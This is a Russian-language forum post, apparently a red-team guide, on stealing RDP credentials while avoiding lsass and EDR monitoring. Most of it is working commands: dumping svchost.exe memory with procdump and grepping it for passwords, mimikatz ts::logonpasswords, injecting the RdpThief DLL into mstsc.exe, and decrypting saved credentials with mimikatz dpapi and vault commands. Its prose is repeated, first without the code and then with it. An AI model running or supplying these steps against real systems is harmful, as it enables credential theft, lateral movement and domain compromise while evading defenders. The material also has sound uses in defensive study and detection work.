devqp
Специалист
Протокол удаленного рабочего стола (RDP) часто используется без должной защиты, что позволяет Red Team извлекать учетные данные для горизонтального перемещения или компрометации домена. Альтернативные методы сбора данных без обращения к lsass (мониторинг EDR) включают эксплуатацию процессов svchost.exe и mstsc.exe.
1. Извлечение из svchost.exe:
При RDP-аутентификации учетные данные хранятся в памяти svchost в открытом виде. Для идентификации нужного процесса:
Пароль отображается в строках памяти. Дамп процесса:
Автономный анализ:
Mimikatz альтернатива:
2. Перехват через mstsc.exe:
Инструмент RdpThief внедряет DLL для перехвата API-функций:
Учетные данные записываются в C:\temp\creds.txt. Улучшенная версия SharpRDPThief (C#) использует IPC-сервер для постоянного мониторинга.
3. Расшифровка сохраненных RDP-файлов:
Учетные данные хранятся в:
Дешифровка Mimikatz:
Просмотр связанного сервера:
Все методы демонстрируют уязвимости в управлении RDP-сессиями и позволяют обходить стандартные механизмы защиты.
1. Извлечение из svchost.exe:
При RDP-аутентификации учетные данные хранятся в памяти svchost в открытом виде. Для идентификации нужного процесса:
Код:
sc queryex termservice
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1
Код:
procdump64.exe -ma [PID] -accepteula C:\target_dir
Код:
strings -el svchost* | grep [Password] -C3
Код:
privilege::debug
ts::logonpasswords
2. Перехват через mstsc.exe:
Инструмент RdpThief внедряет DLL для перехвата API-функций:
Код:
SimpleInjector.exe mstsc.exe RdpThief.dll
3. Расшифровка сохраненных RDP-файлов:
Учетные данные хранятся в:
Код:
C:\Users\[user]\AppData\Local\Microsoft\Credentials\[file_id]
Код:
dpapi::cred /in:[file_path]
sekurlsa::dpapi
dpapi::cred /in:[file_path] /masterkey:[key]
Код:
vault::list
Все методы демонстрируют уязвимости в управлении RDP-сессиями и позволяют обходить стандартные механизмы защиты.